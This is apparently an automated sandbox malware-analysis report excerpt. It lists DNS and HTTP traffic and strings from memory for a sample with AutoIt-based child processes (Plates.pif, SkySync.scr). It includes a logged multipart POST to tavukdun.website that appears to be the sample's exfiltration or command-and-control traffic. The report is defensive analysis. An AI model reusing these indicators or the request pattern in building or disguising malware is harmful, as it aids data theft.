Source: msedge.exe, 0000002F.00000002.172822570098.00007B1C01648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000002.172812949127.00007B1C00CCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {visitedlink.mojom.VisitedLinkNotificationSink [primary] PipeControlMessageHandlerwww.facebook.com equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: oknYaGWfCKieeGw.oknYaGWfCKieeGw
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: tavukdun.website
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic	DNS traffic detected: DNS query: deff.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: px.ads.linkedin.com
Source: global traffic	DNS traffic detected: DNS query: trc.taboola.com
Source: global traffic	DNS traffic detected: DNS query: sync.outbrain.com
Source: global traffic	DNS traffic detected: DNS query: pr-bh.ybp.yahoo.com
Source: global traffic	DNS traffic detected: DNS query: srtb.msn.com
Source: global traffic	DNS traffic detected: DNS query: hbx.media.net
Source: global traffic	DNS traffic detected: DNS query: cm.mgid.com
Source: global traffic	DNS traffic detected: DNS query: eb2.3lift.com
Source: global traffic	DNS traffic detected: DNS query: m.adnxs.com
Source: global traffic	DNS traffic detected: DNS query: code.yengo.com
Source: global traffic	DNS traffic detected: DNS query: visitor.omnitagjs.com
Source: global traffic	DNS traffic detected: DNS query: trace.mediago.io
Source: global traffic	DNS traffic detected: DNS query: trace.popin.cc
Source: global traffic	DNS traffic detected: DNS query: dns.quad9.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: r.msftstatic.com
Source: global traffic	DNS traffic detected: DNS query: ib.adnxs.com
Source: global traffic	DNS traffic detected: DNS query: sync.inmobi.com
Source: global traffic	DNS traffic detected: DNS query: ecn.dev.virtualearth.net

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	TCP traffic: 192.168.11.20:59318 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:59318 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:59318 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:59318 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:53927 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:53927 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:53927 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:53927 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:63477 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:63477 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:63477 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:63477 -> 239.255.255.250:1900

Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172806654832.00007B1C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40096371
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40096608
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40096838
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40644627
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40644912
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/41488637
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42261924
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42263580
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42264193
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42264287
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42264571
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42265509
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42266194
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42266231
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42266232
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42266842
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172806654832.00007B1C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172806654832.00007B1C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172806654832.00007B1C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172806654832.00007B1C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 0000002C.00000002.172374409051.00000C6400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172806654832.00007B1C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1165751
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: chrome.exe, 0000002C.00000002.172372428401.00000C6400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369679433.00000C6400174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369117469.00000C64000EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 0000002C.00000002.172381459953.00000C6401414000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: chrome.exe, 0000002C.00000002.172382265535.00000C64014F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
Source: chrome.exe, 0000002C.00000002.172368740549.00000C6400099000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: JHPvqMzKbz.exe, 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmp, JHPvqMzKbz.exe, 00000000.00000000.168171475927.0000000000408000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: chrome.exe, 00000017.00000003.169458748571.00000D7400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456103057.00000D7401658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456234176.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456463692.00000D7401684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455938436.00000D740162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278073543.00000C640050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275694599.00000C64016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276487178.00000C64016F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275917029.00000C64016CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276131140.00000C6400540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000017.00000003.169458748571.00000D7400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456103057.00000D7401658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456234176.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456463692.00000D7401684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455938436.00000D740162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278073543.00000C640050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275694599.00000C64016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276487178.00000C64016F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275917029.00000C64016CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276131140.00000C6400540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000017.00000003.169458748571.00000D7400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456103057.00000D7401658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456234176.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456463692.00000D7401684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455938436.00000D740162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278073543.00000C640050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275694599.00000C64016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276487178.00000C64016F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275917029.00000C64016CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276131140.00000C6400540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000017.00000003.169458748571.00000D7400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456103057.00000D7401658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456234176.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456463692.00000D7401684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455938436.00000D740162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278073543.00000C640050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275694599.00000C64016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276487178.00000C64016F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275917029.00000C64016CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276131140.00000C6400540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: chrome.exe, 0000002C.00000002.172377176817.00000C6400DD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp, Plates.pif, 0000000B.00000000.168214032566.0000000000BF9000.00000002.00000001.01000000.00000006.sdmp, SkySync.scr, 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmp, SkySync.scr, 00000015.00000000.168333353010.0000000000B59000.00000002.00000001.01000000.00000009.sdmp, SkySync.scr, 00000027.00000000.171156435267.0000000000B59000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: chrome.exe, 0000002C.00000002.172384926281.00000C64018FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/update2/response
Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000017.00000003.169451627129.00000D7400A90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384445135.00000C6401874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273182443.00000C640115F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379060964.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172387615935.00000C6401F31000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272352963.00000C6400A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640115F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;dc_pre=CL6sqZyWpIgDFWU-RAgdUQci9A;src=2542116;type=cli
Source: chrome.exe, 0000002C.00000002.172375679759.00000C6400BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172804919405.00007B1C001E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000002C.00000002.172368575281.00000C6400030000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172804328172.00007B1C000EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000002C.00000002.172372314713.00000C6400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279996265.00000C6400720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372428401.00000C6400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272029471.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280226855.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277467418.00000C6400724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370586589.00000C6400320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000002C.00000002.172368649110.00000C640005C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000002C.00000002.172372314713.00000C6400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279996265.00000C6400720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272029471.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280226855.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277467418.00000C6400724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 0000002C.00000002.172368114920.00000C6000698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.office.com/office/url/setup
